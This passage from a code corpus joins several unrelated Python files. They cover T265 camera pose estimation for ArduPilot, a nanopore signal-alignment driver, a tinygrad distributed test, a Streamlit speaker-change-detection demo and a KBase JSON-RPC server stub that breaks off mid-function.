self.current_confidence_level = float(data.tracker_confidence * 100 / 3)
# In transformations, Quaternions w+ix+jy+kz are represented as [w, x, y, z]!
H_T265Ref_T265body = tf.quaternion_matrix([data.rotation.w, data.rotation.x, data.rotation.y, data.rotation.z])
H_T265Ref_T265body[0][3] = data.translation.x * self.scale_factor
H_T265Ref_T265body[1][3] = data.translation.y * self.scale_factor
H_T265Ref_T265body[2][3] = data.translation.z * self.scale_factor
# Transform to aeronautic coordinates (body AND reference frame!)
self.H_aeroRef_aeroBody = self.H_aeroRef_T265Ref.dot(H_T265Ref_T265body.dot(self.H_T265body_aeroBody))
# vision_speed_estimate_message
# Calculate GLOBAL XYZ speed (speed from T265 is already GLOBAL)
# V_aeroRef_aeroBody = tf.quaternion_matrix([1,0,0,0])
# V_aeroRef_aeroBody[0][3] = data.velocity.x
# V_aeroRef_aeroBody[1][3] = data.velocity.y
# V_aeroRef_aeroBody[2][3] = data.velocity.z
# V_aeroRef_aeroBody = H_aeroRef_T265Ref.dot(V_aeroRef_aeroBody)
# Check for pose jump and increment reset_counter
if self.prev_data is not None:
delta_translation = [data.translation.x - self.prev_data.translation.x, data.translation.y - self.prev_data.translation.y, data.translation.z - self.prev_data.translation.z]
delta_velocity = [data.velocity.x - self.prev_data.velocity.x, data.velocity.y - self.prev_data.velocity.y, data.velocity.z - self.prev_data.velocity.z]
position_displacement = np.linalg.norm(delta_translation)
speed_delta = np.linalg.norm(delta_velocity)
if (position_displacement > self.jump_threshold) or (speed_delta > self.jump_speed_threshold):
if position_displacement > self.jump_threshold:
self.logger.log_warn("Position jumped by: %s" % position_displacement)
elif speed_delta > self.jump_speed_threshold:
self.logger.log_warn("Speed jumped by: %s" % speed_delta)
self._increment_reset_counter()
self.prev_data = data
# Take offsets from body's center of gravity (or IMU) to camera's origin into account
# if self.body_offset_enabled == 1:
# H_body_camera = tf.euler_matrix(0, 0, 0, 'sxyz')
# H_body_camera[0][3] = body_offset_x
# H_body_camera[1][3] = body_offset_y
# H_body_camera[2][3] = body_offset_z
# H_camera_body = np.linalg.inv(H_body_camera)
# H_aeroRef_aeroBody = H_body_camera.dot(H_aeroRef_aeroBody.dot(H_camera_body))
# Realign heading to face north using initial compass data
if self.compass_enabled:
self.H_aeroRef_aeroBody = self.H_aeroRef_aeroBody.dot( tf.euler_matrix(0, 0, self.heading_north_yaw, 'sxyz'))
self._compute_pose_estimate(data)
def _increment_reset_counter(self):
if self.reset_counter >= 255:
self.reset_counter = 1
self.reset_counter += 1
def _compute_pose_estimate(self, data):
if self.H_aeroRef_aeroBody is not None:
current_time_us = int(round(time.time() * 1000000))
# Setup angle data
rpy_rad = np.array( tf.euler_from_matrix(self.H_aeroRef_aeroBody, 'sxyz'))
# Setup covariance data, which is the upper right triangle of the covariance matrix, see here: https://files.gitter.im/ArduPilot/VisionProjects/1DpU/image.png
            # Attempt #01: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = self.cfg.t265['linear_accel_cov'] * pow(10, 3 - int(data.tracker_confidence))
cov_twist = self.cfg.t265['angular_vel_cov'] * pow(10, 1 - int(data.tracker_confidence))
covariance = [cov_pose, 0, 0, 0, 0, 0,
cov_pose, 0, 0, 0, 0,
cov_pose, 0, 0, 0,
cov_twist, 0, 0,
cov_twist, 0,
cov_twist]
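            # Worked example of the scaling above: with High confidence (3) the
            # pose covariance is linear_accel_cov * 10^0, while a Failed
            # estimate (confidence 0) inflates it by 10^3. The 21 values are
            # the upper triangle of the 6x6 covariance matrix, row by row.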
self.pose_estimate_data = [
current_time_us,
self.H_aeroRef_aeroBody[0][3], # Local X position
self.H_aeroRef_aeroBody[1][3], # Local Y position
self.H_aeroRef_aeroBody[2][3], # Local Z position
rpy_rad[0], # Roll angle
rpy_rad[1], # Pitch angle
rpy_rad[2], # Yaw angle
covariance, # Row-major representation of pose 6x6 cross-covariance matrix
self.reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
]
self.logger.log_debug("Captured pose estimate data: %s" % str(self.pose_estimate_data))
|
runSignalAlign.py
|
#!/usr/bin/env python
"""Main driver script for running an ionic current-to-sequence alignment on a single machine.
"""
from __future__ import print_function
import sys
import os
#import pysam
from argparse import ArgumentParser
from random import shuffle
from multiprocessing import Process, current_process, Manager
from signalalign.signalAlignment import SignalAlignment
from signalalign.utils import processReferenceFasta, parseFofn
from signalalign.utils.fileHandlers import FolderHandler
from signalalign.utils.bwaWrapper import getBwaIndex
from signalalign.motif import getDegenerateEnum
def signalAlignSourceDir():
return "/".join(os.path.abspath(__file__).split("/")[:-1]) # returns path without runSignalAlign
def resolvePath(p):
if p is None:
return None
elif p.startswith("/"):
return p
else:
return os.path.abspath(p)
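# For example, resolvePath(None) -> None, resolvePath("/data/ref.fa") is
# returned unchanged, and resolvePath("reads") becomes the absolute path of
# ./reads relative to the current working directory.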
def parse_args():
parser = ArgumentParser(description=__doc__)
# required arguments
parser.add_argument('--file_directory', '-d', action='store',
dest='files_dir', required=True, type=str, default=None,
help="directory with MinION fast5 reads to align")
parser.add_argument('--ref', '-r', action='store',
dest='ref', required=True, type=str,
help="reference sequence to align to, in FASTA")
parser.add_argument('--output_location', '-o', action='store', dest='out',
required=True, type=str, default=None,
help="directory to put the alignments")
# optional arguments
parser.add_argument("--2d", action='store_true', dest="twoD", default=False, help="flag, specify if using 2D reads")
parser.add_argument("--bwt", action='store', dest="bwt", default=None, help="path to BWT files. example: ../ref.fasta")
parser.add_argument('--in_template_hmm', '-T', action='store', dest='in_T_Hmm',
required=False, type=str, default=None,
help="input HMM for template events, if you don't want the default")
parser.add_argument('--in_complement_hmm', '-C', action='store', dest='in_C_Hmm',
required=False, type=str, default=None,
help="input HMM for complement events, if you don't want the default")
parser.add_argument('--template_hdp', '-tH', action='store', dest='templateHDP', default=None,
help="template serialized HDP file")
parser.add_argument('--complement_hdp', '-cH', action='store', dest='complementHDP', default=None,
help="complement serialized HDP file")
parser.add_argument('--degenerate', '-x', action='store', dest='degenerate', default="variant",
help="Specify degenerate nucleotide options: "
"variant -> {ACGT}, cytosine2 -> {CE} cytosine3 -> {CEO} adenosine -> {AI}")
parser.add_argument('--stateMachineType', '-smt', action='store', dest='stateMachineType', type=str,
default="threeState", help="decide which model to use, threeState by default")
parser.add_argument('--file_of_files', '-fofn', action='store', dest='fofn', required=False, type=str, default=None,
help="text file containing absolute paths to files to use")
parser.add_argument('--threshold', '-t', action='store', dest='threshold', type=float, required=False,
default=0.01, help="posterior match probability threshold, Default: 0.01")
parser.add_argument('--diagonalExpansion', '-e', action='store', dest='diag_expansion', type=int,
required=False, default=None,
help="number of diagonals to expand around each anchor default: 50")
parser.add_argument('--constraintTrim', '-m', action='store', dest='constraint_trim', type=int,
required=False, default=None, help='amount to remove from an anchor constraint')
parser.add_argument('--target_regions', '-q', action='store', dest='target_regions', type=str,
required=False, default=None, help="tab separated table with regions to align to")
parser.add_argument("--motif", action="store", dest="motif_key", default=None)
parser.add_argument('--ambiguity_positions', '-p', action='store', required=False, default=None,
dest='ambiguity_positions', help="Ambiguity positions")
parser.add_argument('--jobs', '-j', action='store', dest='nb_jobs', required=False,
default=4, type=int, help="number of jobs to run in parallel")
parser.add_argument('--nb_files', '-n', action='store', dest='nb_files', required=False,
default=500, type=int, help="maximum number of reads to align")
parser.add_argument('--ambig_char', '-X', action='store', required=False, default=None, type=str, dest='ambig_char',
help="")
parser.add_argument('--output_format', '-f', action='store', default="full", dest='outFmt',
help="output format: full, variantCaller, or assignments. Default: full")
parser.add_argument('--debug', action='store_true', dest="DEBUG", default=False)
args = parser.parse_args()
return args
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
    except Exception as e:
        done_queue.put("%s failed with %s" % (current_process().name, str(e)))
def concat_variant_call_files(path):
concat_command = "cat {path}/*.tsv > {path}/probs.tsv".format(path=path)
os.system(concat_command)
return
def main(args):
# parse args
args = parse_args()
command_line = " ".join(sys.argv[:])
print("Command Line: {cmdLine}\n".format(cmdLine=command_line), file=sys.stderr)
# get absolute paths to inputs
args.files_dir = resolvePath(args.files_dir)
args.ref = resolvePath(args.ref)
args.out = resolvePath(args.out)
args.bwt = resolvePath(args.bwt)
args.in_T_Hmm = resolvePath(args.in_T_Hmm)
args.in_C_Hmm = resolvePath(args.in_C_Hmm)
args.templateHDP = resolvePath(args.templateHDP)
args.complementHDP = resolvePath(args.complementHDP)
args.fofn = resolvePath(args.fofn)
args.target_regions = resolvePath(args.target_regions)
args.ambiguity_positions = resolvePath(args.ambiguity_positions)
start_message = """
# Starting Signal Align
# Aligning files from: {fileDir}
# Aligning to reference: {reference}
# Aligning maximum of {nbFiles} files
# Using model: {model}
# Using banding: True
# Aligning to regions in: {regions}
# Non-default template HMM: {inThmm}
# Non-default complement HMM: {inChmm}
# Template HDP: {tHdp}
# Complement HDP: {cHdp}
""".format(fileDir=args.files_dir, reference=args.ref, nbFiles=args.nb_files,
inThmm=args.in_T_Hmm, inChmm=args.in_C_Hmm, model=args.stateMachineType, regions=args.target_regions,
tHdp=args.templateHDP, cHdp=args.complementHDP)
print(start_message, file=sys.stdout)
if args.files_dir is None and args.fofn is None:
print("Need to provide directory with .fast5 files of fofn", file=sys.stderr)
sys.exit(1)
if not os.path.isfile(args.ref):
print("Did not find valid reference file, looked for it {here}".format(here=args.ref), file=sys.stderr)
sys.exit(1)
# make directory to put temporary files
temp_folder = FolderHandler()
temp_dir_path = temp_folder.open_folder(args.out + "/tempFiles_alignment")
reference_map = processReferenceFasta(fasta=args.ref,
motif_key=args.motif_key,
work_folder=temp_folder,
sub_char=args.ambig_char,
positions_file=args.ambiguity_positions)
# index the reference for bwa
if args.bwt is not None:
print("[RunSignalAlign]NOTICE - using provided BWT %s" % args.bwt)
bwa_ref_index = args.bwt
else:
print("signalAlign - indexing reference", file=sys.stderr)
bwa_ref_index = getBwaIndex(args.ref, temp_dir_path)
print("signalAlign - indexing reference, done", file=sys.stderr)
# setup workers for multiprocessing
workers = args.nb_jobs
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
# list of read files
if args.fofn is not None:
fast5s = [x for x in parseFofn(args.fofn) if x.endswith(".fast5")]
else:
fast5s = ["/".join([args.files_dir, x]) for x in os.listdir(args.files_dir) if x.endswith(".fast5")]
nb_files = args.nb_files
if nb_files < len(fast5s):
shuffle(fast5s)
fast5s = fast5s[:nb_files]
# change paths to the source directory
os.chdir(signalAlignSourceDir())
print("[runSignalAlign]:NOTICE: Got {} files to align".format(len(fast5s)), file=sys.stdout)
for fast5 in fast5s:
print(fast5)
alignment_args = {
"reference_map": reference_map,
"destination": temp_dir_path,
"stateMachineType": args.stateMachineType,
"bwa_index": bwa_ref_index,
"in_templateHmm": args.in_T_Hmm,
"in_complementHmm": args.in_C_Hmm,
"in_templateHdp": args.templateHDP,
"in_complementHdp": args.complementHDP,
"output_format": args.outFmt,
"in_fast5": fast5,
"threshold": args.threshold,
"diagonal_expansion": args.diag_expansion,
"constraint_trim": args.constraint_trim,
"degenerate": getDegenerateEnum(args.degenerate),
"twoD_chemistry": args.twoD,
"target_regions": args.target_regions,
}
if args.DEBUG:
alignment = SignalAlignment(**alignment_args)
alignment.run()
else:
work_queue.put(alignment_args)
    for w in range(workers):
p = Process(target=aligner, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
print("\n# signalAlign - finished alignments\n", file=sys.stderr)
print("\n# signalAlign - finished alignments\n", file=sys.stdout)
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
node_test.py
|
from multiprocessing import Process
import unittest
import numpy as np
import time
import torch
from tinygrad.tensor import Tensor
from node import NodeManager, Worker
U_init = np.random.randn(3,3).astype(np.float32)
V_init = np.random.randn(3,3).astype(np.float32)
W_init = np.random.randn(3,3).astype(np.float32)
def run_remote(func, port):
worker = Worker(func, port)
worker.run()
class TestDist(unittest.TestCase):
def test_broadcast(self):
man = NodeManager()
node = man.add_node("localhost:8080")
u = Tensor(U_init)
forward = lambda u: u
procs = [
Process(target=run_remote, args=[forward, 8080]),
]
[proc.start() for proc in procs]
time.sleep(1)
x = man.broadcast(u, node)
y = man.reduce(x)
np.testing.assert_allclose(u.data, y.data, atol=1e-5)
man.terminate(node)
[proc.join() for proc in procs]
# TODO add backward test
def test_reduce_forward(self):
man = NodeManager()
node1 = man.add_node("localhost:8080")
node2 = man.add_node("localhost:8081")
def test_tinygrad():
u = Tensor(U_init)
v = Tensor(V_init)
w = Tensor(W_init)
forward1 = lambda u: u.mul(v).relu()
forward2 = lambda u: u.mul(w).relu()
procs = [
Process(target=run_remote, args=[forward1, 8080]),
Process(target=run_remote, args=[forward2, 8081]),
]
[proc.start() for proc in procs]
x, y = man.broadcast(u, node1, node2)
out = man.reduce(x, y).relu()
out = out.logsoftmax()
out = out.sum()
[man.terminate(node) for node in [node1, node2]]
[proc.join() for proc in procs]
return out.cpu().data#, u.cpu().grad.data, v.cpu().grad.data, w.cpu().grad.data
def test_pytorch():
u = torch.tensor(U_init, requires_grad=True)
v = torch.tensor(V_init, requires_grad=True)
w = torch.tensor(W_init, requires_grad=True)
x = u.mul(v).relu()
y = u.mul(w).relu()
out = x.add(y).relu()
out = torch.nn.functional.log_softmax(out, dim=1)
out = out.sum()
return out.detach().numpy()#, u.grad, v.grad, w.grad
x, y = test_tinygrad(), test_pytorch()
np.testing.assert_allclose(x, y, atol=1e-5)
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import streamlit.components.v1 as components
import streamlit as st
import time
import numpy as np
import IPython.display as ipd
#ipd.Audio(audio, rate=16000)
from online_scd.model import SCDModel
from online_scd.streaming import StreamingDecoder
import timeit
import base64
import scipy.io.wavfile
from online_scd.utils import load_wav_file
import multiprocessing
#import playsound
import queue
import time
from typing import List
import numpy as np
import pydub
from pydub.playback import play
import streamlit as st
from streamlit_webrtc import (
ClientSettings,
WebRtcMode,
webrtc_streamer,
)
from pathlib import Path
import os, time, sys
# Create a _RELEASE constant. We'll set this to False while we're developing
# the component, and True when we're ready to package and distribute it.
# (This is, of course, optional - there are innumerable ways to manage your
# release process.)
_RELEASE = False
upload_counter = 0
# Declare a Streamlit component. `declare_component` returns a function
# that is used to create instances of the component. We're naming this
# function "_component_func", with an underscore prefix, because we don't want
# to expose it directly to users. Instead, we will create a custom wrapper
# function, below, that will serve as our component's public API.
# It's worth noting that this call to `declare_component` is the
# *only thing* you need to do to create the binding between Streamlit and
# your component frontend. Everything else we do in this file is simply a
# best practice.
if not _RELEASE:
_component_func = components.declare_component(
# We give the component a simple, descriptive name ("my_component"
# does not fit this bill, so please choose something better for your
# own component :)
"my_component",
# Pass `url` here to tell Streamlit that the component will be served
# by the local dev server that you run via `npm run start`.
# (This is useful while your component is in development.)
url="http://localhost:3001",
)
model = SCDModel.load_from_checkpoint("template/my_component/test/sample_model/checkpoints/epoch=102.ckpt")
#file_path = "template/my_component/frontend/src/audio"
file_name = "template/my_component/frontend/src/audio/3321821.wav"
build_dir = "template/my_component/frontend/src"
else:
# When we're distributing a production version of the component, we'll
# replace the `url` param with `path`, and point it to to the component's
# build directory:
parent_dir = os.path.dirname(os.path.abspath(__file__))
build_dir = os.path.join(parent_dir, "frontend/build")
_component_func = components.declare_component("my_component", path=build_dir)
model = SCDModel.load_from_checkpoint("template/my_component/test/sample_model/checkpoints/epoch=102.ckpt")
#file_path = "template/my_component/frontend/src/audio"
file_name = "template/my_component/frontend/src/audio/3321821.wav"
# Create a wrapper function for the component. This is an optional
# best practice - we could simply expose the component function returned by
# `declare_component` and call it done. The wrapper allows us to customize
# our component's API: we can pre-process its input args, post-process its
# output value, and add a docstring for users.
def my_component(name, audio, key=None):
"""Create a new instance of "my_component".
Parameters
----------
name: str
The name of the thing we're saying hello to. The component will display
the text "Hello, {name}!"
key: str or None
An optional key that uniquely identifies this component. If this is
None, and the component's arguments are changed, the component will
be re-mounted in the Streamlit frontend and lose its current state.
Returns
-------
int
The number of times the component's "Click Me" button has been clicked.
(This is the value passed to `Streamlit.setComponentValue` on the
frontend.)
"""
# Call through to our private component function. Arguments we pass here
# will be sent to the frontend, where they'll be available in an "args"
# dictionary.
#
# "default" is a special argument that specifies the initial return
# value of the component before the user has interacted with it.
component_value = _component_func(name=name, audio=audio, key=key, default=0)
# We could modify the value returned from the component if we wanted.
# There's no need to do this in our simple example - but it's an option.
return component_value
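# Example call (sketch): the return value is the click counter reported by the
# frontend, so a simple interaction could look like
#
#   clicks = my_component(name="demo", audio="sample", key="demo")
#   if clicks:
#       st.write("Playback requested")
#
# The "sample" audio identifier mirrors how stream_sample() below calls the
# component; it is not a documented API of the frontend.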
# Add some test code to play with the component while it's in development.
# During development, we can run this just as we would any other Streamlit
# app: `$ streamlit run my_component/__init__.py`
def stream_sample():
st.subheader("Streaming a sample .wav")
# Create a second instance of our component whose `name` arg will vary
# based on a text_input widget.
#
# We use the special "key" argument to assign a fixed identity to this
# component instance. By default, when a component's arguments change,
# it is considered a new instance and will be re-mounted on the frontend
# and lose its current state. In this case, we want to vary the component's
# "name" argument without having it get recreated.
sound = pydub.AudioSegment.from_wav(file_name)
sound = sound.set_channels(1).set_frame_rate(16000)
audio = np.array(sound.get_array_of_samples())/32768
#enc=base64.b64encode(open(file_name, "rb").read())
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
frame_number = 0
#p = multiprocessing.Process(target=playsound.playsound, args=(file_name,))
#play_obj = wave_obj.play()
start_0 = timeit.default_timer()
was_clicked = my_component(name="test", audio = "sample", key="foo")
if was_clicked:
for i in range(0, len(audio), 1000):
# while (num_clicks%2 == 0):
# time.sleep(0.1)
start = timeit.default_timer()
for probs in st.session_state.model.process_audio(audio[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
end = timeit.default_timer()
# text_output.markdown(f"{end-start_0} seconds")
time.sleep(max(0,1/16-end+start))
# st.button("Re-run")
def stream_mic():
st.subheader("Streaming from microphone")
webrtc_ctx = webrtc_streamer(
key="speech-to-text",
mode=WebRtcMode.SENDONLY,
audio_receiver_size=1024,
client_settings=ClientSettings(
rtc_configuration={
"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]
},
media_stream_constraints={"video": False, "audio": True},
),
)
status_indicator = st.empty()
if not webrtc_ctx.state.playing:
return
status_indicator.write("Loading...")
text_output = st.empty()
stream = None
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
streaming_decoder = StreamingDecoder(model)
frame_number = 0
status_indicator.write("Model loaded.")
ct=0
while True:
if webrtc_ctx.audio_receiver:
sound_chunk = pydub.AudioSegment.empty()
try:
audio_frames = webrtc_ctx.audio_receiver.get_frames(timeout=1)
except queue.Empty:
time.sleep(0.1)
status_indicator.write("No frame arrived.")
continue
status_indicator.write("Running. Say something!")
for audio_frame in audio_frames:
sound = pydub.AudioSegment(
data=audio_frame.to_ndarray().tobytes(),
sample_width=audio_frame.format.bytes,
frame_rate=audio_frame.sample_rate,
channels=len(audio_frame.layout.channels),
)
sound_chunk += sound
if len(sound_chunk) > 0:
sound_chunk = sound_chunk.set_channels(1).set_frame_rate(
16000
)
buffer = np.array(sound_chunk.get_array_of_samples())
text_output.markdown(f"{ct/16000} seconds")
buffer = np.array(buffer)/32768
ct+=len(buffer)
#text_output.markdown(f"burh{ct}")
for i in range(0, len(buffer), 1000):
for probs in st.session_state.model.process_audio(buffer[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
else:
status_indicator.write("AudioReciver is not set. Abort.")
break
file_changed = False
def upload_file():
global file_changed
file_changed = True
if 'upload' not in st.session_state:
st.session_state['upload'] = 'value'
if 'model' not in st.session_state:
st.session_state['model'] = StreamingDecoder(model)
def stream_upload():
#global upload_counter
st.subheader("Streaming an upload")
# Create a second instance of our component whose `name` arg will vary
# based on a text_input widget.
#
# We use the special "key" argument to assign a fixed identity to this
# component instance. By default, when a component's arguments change,
# it is considered a new instance and will be re-mounted on the frontend
# and lose its current state. In this case, we want to vary the component's
# "name" argument without having it get recreated.
# name_input = st.text_input("Enter a name", value="Streamlit")
    uploaded_file = st.file_uploader("Choose a file", on_change=upload_file)
#if uploaded_file is not None
#was_clicked = my_component(name="test",audio = file_name, key="foo")
if uploaded_file is not None:
if (uploaded_file.name != st.session_state['upload']):
st.session_state['upload'] = uploaded_file.name
#upload_counter+=1
path = build_dir + "/audio"
current_uploads = []
for f in os.listdir(path):
current_uploads.append(f.split(".")[0])
i = 0
while True:
if str(i) not in current_uploads:
new_name = str(i)
break
i+=1
sound = pydub.AudioSegment.from_wav(uploaded_file)
sound = sound.set_channels(1).set_frame_rate(16000)
#only consider first minute of the file for uploads
sound = sound[:60*1000]
audio = np.array(sound.get_array_of_samples())/32768
file_name = new_name + ".wav"
save_location = build_dir +"/audio/"+ file_name
sound = (sound[:2000]-1000) + sound
sound.export(save_location, format="wav")
st.session_state['file_name'] = file_name
st.session_state['audio'] = audio
#p = multiprocessing.Process(target=playsound.playsound, args=(file_name,))
#play_obj = wave_obj.play()
file_name = st.session_state['file_name']
start_0 = timeit.default_timer()
was_clicked = my_component(name="test2",audio = file_name)
if was_clicked:
#streaming_decoder = StreamingDecoder(model)
frame_number = 0
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
#audio = st.session_state['audio']
for i in range(0, len(st.session_state.audio), 1000):
# while (num_clicks%2 == 0):
# time.sleep(0.1)
start = timeit.default_timer()
for probs in st.session_state.model.process_audio(st.session_state.audio[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
end = timeit.default_timer()
# text_output.markdown(f"{end-start_0} seconds")
time.sleep(max(0,1/16-end+start))
# st.button("Re-run")
#os.remove(save_location)
def main():
st.header("Demo of Collar-Aware Training for Speaker Change Detection")
st.markdown("The model uses a multi-layer LSTM on top of pre-trained speech embeddings, and a final softmax layer. The model uses a step size of 100 ms (i.e., it outputs 10 decisions per second). The model is implemented in Pytorch while this demo was built using Streamlit.")
st.markdown("The model is trained using a special version of cross-entropy training which tolerates small errors in the hypothesized speaker change timestamps. Due to this, the softmax outputs of the trained model are very peaky and do not require any local maxima tracking for extracting the final speaker turn points. This makes the model suitable for online appications.")
st.markdown("This demo visualizes the output of the model for an audio source. The audio source can be either a sample file, a microphone or an uploaded file, first 60 seconds of which is used.")
option_1 = 'A sample file'
option_2 = 'A microphone'
option_3 = 'An uploaded .wav file'
option = st.selectbox(
'Which audio source would you like to use?',
(option_1,option_2,option_3), 0)
if option == option_1:
#file_name = "3321821.wav"
stream_sample()
elif option == option_2:
stream_mic()
elif option == option_3:
stream_upload()
path = build_dir + "/audio"
now = time.time()
for f in os.listdir(path):
if f!="3321821.wav" and f[-3:] == "wav":
f = os.path.join(path, f)
if os.stat(f).st_mtime < now - 3600:
if os.path.isfile(f):
os.remove(f)
if __name__ == "__main__":
main()
|
Report_util_landmlServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Report_util_landml.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Report_util_landml'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Report_util_landml.Report_util_landmlImpl import Report_util_landml # noqa @IgnorePep8
impl_Report_util_landml = Report_util_landml(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
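# For reference, a hedged sketch of the request/response shape handled above
# (field values are illustrative placeholders, not taken from a real call):
# call_py() receives an already-deserialized JSON-RPC 1.1 request and
# _handle_request() builds a response dict carrying the method's return value,
# roughly:
#
#     request  = {'version': '1.1', 'id': '42',
#                 'method': 'Report_util_landml.genome_report',
#                 'params': [<method input dict>]}
#     response = {'version': '1.1', 'id': '42', 'result': <method return value>}
#
# Requests whose 'id' is None are treated as notifications and get no response.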
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
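    # Note on the mapping above: numeric debug levels 1-3 are shifted to the
    # logger's levels 7-9, while the named/raw levels listed in
    # self._debug_levels pass through unchanged. For example (illustrative),
    # ctx.log_debug('msg', level=2) logs at level 8.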
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
